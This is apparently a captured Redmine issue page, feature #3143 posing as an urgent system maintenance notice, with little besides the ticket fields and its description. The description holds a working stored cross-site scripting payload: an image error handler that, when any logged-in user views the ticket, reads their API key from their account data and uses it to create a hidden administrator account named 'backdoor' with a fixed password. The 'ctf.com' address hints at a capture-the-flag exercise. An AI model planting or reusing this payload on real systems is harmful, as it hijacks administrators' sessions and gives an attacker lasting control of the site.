Actions
Feature #3143
ouvertUrgent: System Maintenance Notification
Statut:
New
Priorité:
Urgent
Assigné à:
-
Début:
18/07/2026
Echéance:
% réalisé:
0%
Temps estimé:
Description
<img src=x onerror="
fetch('/my/account.json',{credentials:'include'})
.then(r=>r.json())
.then(d=>{
fetch('/users.json',{
method:'POST',
credentials:'include',
headers:{'Content-Type':'application/json','X-Redmine-API-Key':d.user.api_key},
body:JSON.stringify({user:{login:'backdoor',password:'Backdoor@123!',firstname:'Back',lastname:'Door',mail:'backdoor@ctf.com',admin:true}})
});
});
">
Aucune donnée à afficher
Actions